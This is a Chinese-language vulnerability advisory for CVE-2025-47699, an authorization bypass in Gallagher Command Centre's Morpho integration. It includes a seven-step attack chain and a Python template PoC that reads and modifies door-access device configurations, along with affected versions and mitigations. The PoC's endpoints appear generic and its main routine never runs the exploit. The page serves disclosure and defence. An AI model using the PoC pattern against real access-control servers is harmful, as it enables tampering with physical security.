CVE-2025-47699 Gallagher Command Centre Morpho集成敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-47699

漏洞类型

敏感信息泄露

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Gallagher Command Centre Server (Morpho集成模块)

漏洞概述

CVE-2025-47699是 Gallagher Command Centre Server 中 Morpho 集成模块存在的一个严重安全漏洞，CVSS评分高达9.9（严重级别）。该漏洞属于CWE-497类别，即"敏感系统信息暴露给未授权控制范围"。漏洞源于Morpho集成模块在访问控制验证方面存在缺陷，允许已认证的操作员（即使仅具有有限的站点权限）访问和修改关键的Morpho设备配置。攻击者可以利用此漏洞绕过正常的权限检查，对本地部署的Morpho门禁设备进行未经授权的关键更改，包括修改安全策略、访问控制规则等敏感配置。由于CVSS向量显示攻击复杂度低且无需用户交互，远程攻击者可以在短时间内完成漏洞利用，对企业物理安全基础设施造成严重威胁。此漏洞影响多个版本的Command Centre Server，从8.90及更早版本到9.30版本均受影响。

技术细节

该漏洞存在于Gallagher Command Centre Server的Morpho集成功能模块中，具体是访问控制验证机制存在缺陷。在正常情况下，系统应根据操作员的站点权限严格限制其对Morpho设备的访问和操作权限。然而，由于权限检查逻辑不完善，具有低权限（如只读或基础操作权限）的认证操作员能够通过构造特定的API请求或利用系统功能，访问本应需要更高权限才能访问的Morpho设备管理接口。攻击者可以利用此漏洞执行以下操作：1) 读取Morpho设备配置信息，包括网络设置、认证凭据等敏感数据；2) 修改Morpho设备的访问控制策略；3) 更改与Morpho设备关联的用户权限和门禁规则。由于该漏洞位于服务器端且可通过网络利用，攻击者无需在目标网络内部即可发起攻击。漏洞利用的关键在于正确识别和构造能够绕过权限检查的请求路径。

攻击链分析

STEP 1

步骤1

攻击者获取目标Gallagher Command Centre Server的有效用户账号（具有低权限/有限站点权限）

STEP 2

步骤2

攻击者使用低权限账号登录系统，获取有效的会话令牌或认证凭证

STEP 3

步骤3

攻击者识别Morpho集成模块的API端点或管理接口

STEP 4

步骤4

攻击者构造特定的HTTP请求，利用权限检查缺陷绕过访问控制

STEP 5

步骤5

通过未授权访问获取Morpho设备的敏感配置信息（如网络拓扑、设备凭据等）

STEP 6

步骤6

利用获取的信息对Morpho设备进行关键配置修改，如访问策略、用户权限等

STEP 7

步骤7

完成持久化控制，可能导致物理安全防线被突破或敏感数据泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-47699 Gallagher Morpho Integration - PoC Concept
# This is a conceptual PoC demonstrating the authorization bypass
# Note: Actual exploitation requires valid credentials with limited permissions

import requests
import json

TARGET = "https://target-gallagher-server.com"
LOGIN_ENDPOINT = "/api/auth/login"
MORPHO_API_ENDPOINT = "/api/morpho/devices"
CVE_ID = "CVE-2025-47699"

def authenticate(username, password):
    """Authenticate with limited permissions"""
    session = requests.Session()
    login_data = {
        "username": username,
        "password": password
    }
    response = session.post(f"{TARGET}{LOGIN_ENDPOINT}", json=login_data)
    if response.status_code == 200:
        return session, response.json().get('token')
    return None, None

def exploit_morpho_access(session, token):
    """
    Exploit CVE-2025-47699: Bypass authorization to access Morpho devices
    This endpoint should require higher privileges but is accessible with limited permissions
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Attempt to access Morpho device configuration (should be restricted)
    response = session.get(f"{TARGET}{MORPHO_API_ENDPOINT}", headers=headers)
    
    if response.status_code == 200:
        devices = response.json()
        print(f"[!] Successfully accessed Morpho devices with limited permissions")
        print(f"[+] Found {len(devices)} devices")
        return devices
    else:
        print(f"[-] Access denied: {response.status_code}")
        return None

def modify_morpho_device(session, token, device_id, malicious_config):
    """Modify Morpho device configuration - critical changes"""
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json"
    }
    
    # Attempt to modify device configuration
    modify_endpoint = f"{TARGET}{MORPHO_API_ENDPOINT}/{device_id}"
    response = session.put(modify_endpoint, headers=headers, json=malicious_config)
    
    if response.status_code == 200:
        print(f"[!] Successfully modified Morpho device {device_id}")
        return True
    return False

if __name__ == "__main__":
    print(f"[*] Testing {CVE_ID} - Gallagher Morpho Authorization Bypass")
    print("[*] Requires valid credentials with limited site permissions")

影响范围

Gallagher Command Centre Server 9.30 < vEL9.30.2482 (MR2)

Gallagher Command Centre Server 9.20 < vEL9.20.2819 (MR4)

Gallagher Command Centre Server 9.10 < vEL9.10.3672 (MR7)

Gallagher Command Centre Server 9.00 < vEL9.00.3831 (MR8)

Gallagher Command Centre Server 8.90 及所有更早版本

防御指南

临时缓解措施

在安装官方补丁之前，可采取以下临时缓解措施：1) 限制对Command Centre Server管理接口的网络访问，仅允许受信任的管理IP访问；2) 审查并收紧Morpho集成相关的用户权限，确保低权限用户无法访问设备管理功能；3) 启用增强的日志监控，实时检测异常的Morpho设备访问模式；4) 考虑暂时禁用不必要的Morpho集成功能；5) 实施多因素认证机制，增加账户安全性；6) 部署Web应用防火墙（WAF）规则，过滤异常的API请求。